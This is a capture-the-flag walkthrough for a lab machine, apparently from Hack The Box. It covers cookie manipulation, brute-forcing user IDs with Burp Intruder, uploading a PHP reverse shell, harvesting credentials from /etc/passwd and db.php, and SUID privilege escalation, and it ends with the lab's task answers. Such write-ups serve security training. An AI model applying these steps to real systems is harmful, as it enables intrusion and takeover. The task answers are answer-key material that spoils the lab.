Table of Contents
Whenever you are performing a web assessment that includes authentication mechanisms, it's always advised to check cookies, and sessions, and try to figure out “How access control really work?”.
Introduction
In many cases, a Remote Code Execution attack and a foothold on the system might not be achievable by itself, but rather after chaining different types of vulnerabilities and exploits.
In this session, we are going to learn about Information Disclosure and Broken Access
Control types of vulnerabilities even though they seem not very important. It can
have a great impact while attacking a system, and thus why even small
vulnerabilities matter.
Pre-requisite
Before you start to enumerate the target you must install the below tools:
- Mozilla Firefox
- Burp Suite (Learn More)
Enumeration
Find the target IP by clicking on "Spawn Machine".
We are going to start our enumeration by searching for any open ports using the Nmap tool:
We can spot port 22 (SSH), and port 80 (HTTP) as open. We
visit the IP using the web browser where we face a website for automotive.
On the homepage, it is possible to locate interesting information about how one can access the services through login:
According to this information, the website should have a login page. Before we proceed with the directory and page enumeration, we can try to map the website by using the Burp Suite proxy to passively spider the website.
- Learn More:
Burp Suite Web Crawler, Scanner, Proxy, Intruder
This article explores the features of Burp Suite, a popular cybersecurity tool used for web application security testing. It covers its web crawler, scanner, proxy, and intruder functionalities, which are essential for identifying vulnerabilities and securing web applications.
Intercept the Web Data using Burpsuite
First, we will start Burp Suite, and configure the browser to send traffic through the proxy. Navigate to Proxy Tab, and under Intercept, the sub-tab selects the button where Intercept is off so to enable it.
Now click on the Foxy Proxy extension, and Enable Burp Suite Proxy.
Now that everything is set up correctly, let’s refresh the page in our browser. Now switch to Burp suite and forward the http request.
Switch to the Target tab and then to the Sitemap option. It is possible to spot some directories and files that weren't visible while browsing. One that is indeed very interesting it's the directory of login.
It is possible to spot some directories and files that weren't visible while browsing. One that is indeed very interesting it's the directory of /cdn-cgi/login.
We can visit it in our browser and indeed we are presented with the login page:
As we have no valid credentials to get login access. But, there is also an option to log in as a Guest.
Trying that and now we are presented with a couple of new navigation options as we are logged in as guests.
After navigating through the available pages, we spot that the only interesting one seems to be the Uploads. However, it is not possible to access it as we need to have super admin rights.
Now, we need to find a way to escalate our privileges from user Guest to super admin role. One way to try this is by checking if cookies and sessions can be manipulated.
Identifying Users via Intruder Attack with Burp Suite
Let's examine the portal further in Burp. We refresh the Accounts page, which displays the user ID for our current user and intercepts the request. We notice what seems to be a custom cookie implementation, comprising of the user value and role. We also noticed the id parameter, which for our current admin user is 2.
It might be possible to brute force the ID values and display the user value for another user, such as the super admin account. We can do this using Burp's Intruder module. Click CTRL + I to send the request to Intruder.
Click on Position and press Clear to remove the pre-populated payload positions:
Select the ID value (2) , and click Add . Next, click on the Payloads tab:
We can generate a sequential list of 1 to 100 using a simple bash loop using an online bash compiler (Click Here).
Paste the output into the payload
box:
Next, click on the Options tab, ensure that Follow Redirections is set to " Always ", and select the option to " Process cookies in redirections ".
Now, click on the Target tab, and then click Start Attack.
Sort responses by Length and view the results. A few of the responses have a different length, and we proceed to examine them. The super admin account is visible, and the corresponding user value is identified.
There are two admins that I have found by using the brute-forcing attack. After a try, I found that id 1 is admin and id 30 is super admin. I think, there is a mistake with this machine. The upload is only possible with the admin with ID 1.
Let's try to access the Uploads page again, substituting our user value with the admin:
It is possible to view and change cookies in Mozilla Firefox through the usage of Developer Tools.
Developer tools are a set of web developer tools built into Firefox. You can use them to examine, edit, and debug HTML, CSS, and JavaScript.
In order to enter the Developer Tools panel, we need to right-click in the content of the webpage and select the Inspect Element(Q).
Then we can navigate to the Storage section where Cookies are being presented. Indeed we have an information disclosure vulnerability, which we might be able to abuse. We now know the access ID of the admin user thus we can try to change the values in our cookie through the Developer tools so the user value is 34322 and the role value is admin.
Then we can revisit the Uploads page.
We finally got access to the upload form.
Foothold
Now that we have access to the upload form we can attempt to upload a PHP reverse shell.
Establish Server Access Using PHP Reverse Shell
Instead of creating our own one, we will use an existing one. You can find the code from GitHub.
PHP Reverse Shell
This repository contains a PHP script for generating a reverse shell. Reverse shells are commonly used in penetration testing and security assessments to gain remote access to a system. This PHP script can be used to establish a reverse shell connection to a target machine.
Copy this code and paste it
to Notepad or Notepad++.
Now, modify the code so it can suit our needs. We are going to change the Listening Host IP($ip={openVPN IP}) and the Listening port variables($port=4444) to match our settings and then we will attempt to upload the file.
We finally managed to upload it. Now we might need to brute-force directories in order to locate the folder where the uploaded files are stored but we can also guess it.
The uploads directory seems to be a logical assumption. We confirm that by running also the gobuster tool.
The gobuster immediately found the /uploads directory. But, we don't have permission to access the directory but we can try to access our uploaded file. Before that make sure, we will need to set up a Netcat connection.
Then request our shell through the browser (
http://{target IP}/uploads/php-reverse-shell.php
).
Go back to the Netcat listener and find out if the connection is established or not.
Note: In case our shell is not there it might have been deleted so we need to upload it again.
We got a reverse shell! In order to have a functional shell though we can issue a python3 TTY cheat sheet .
As the user of www-data, we can't achieve many things as the
role has restricted access to the system.
We can check the available users on the system by reading the /etc/passwd file so we can try a password reuse of this password.
We found a new user named, Robert. You can find the user flag from the /home/robert directory.
Since the website is making use of PHP and SQL, we can enumerate further the web directory for potential disclosures or misconfigurations. After some search, we can find some interesting php files under /var/www/html/cdn-cgi/login directory.
Now that we got the password we can successfully log in:
we can successfully log in.
Privilege Escalation
Before running any privilege escalation or enumeration script, let's check the basic commands for elevating privileges like sudo and id.
We observe that user Robert is part of the group bug tracker.
Exploiting Privilege Escalation Vulnerability in Bugtracker
Let's try to see if there is any binary within that group. We found a file named bug tracker. We check what privileges and what type of file is it.
There is a suid set on that binary, which is a promising exploitation path. Now, we will execute the bug tracker and provide bug ID: 2.
As you can see we got root permissions. The root flag can be found in the /root folder.
We got both the flags, congratulations!
Task Answer
TASK 1: With what kind of tool can intercept web traffic?
Ans. proxy
TASK 2: What is the path to the directory on the web server that returns a login page?
Ans. /cdn-cgi/loginTASK 3: What can be modified in Firefox to get access to the upload page?
Ans. cookieTASK 4: What is the access ID of the admin user?
Ans. 34322TASK 5: On uploading a file, what directory does that file appear in on the server?
Ans. /uploadsTASK 6: What is the file that contains the password that is shared with the robert user?
Ans. db.phpTASK 7: What executable is run with the option "-group bugtracker" to identify all files owned by the bugtracker group?
Ans. findAns. root
TASK 9: What SUID stands for?
Ans. Set owner User ID
TASK 10: What is the name of the executable being called in an insecure manner?
Ans. cat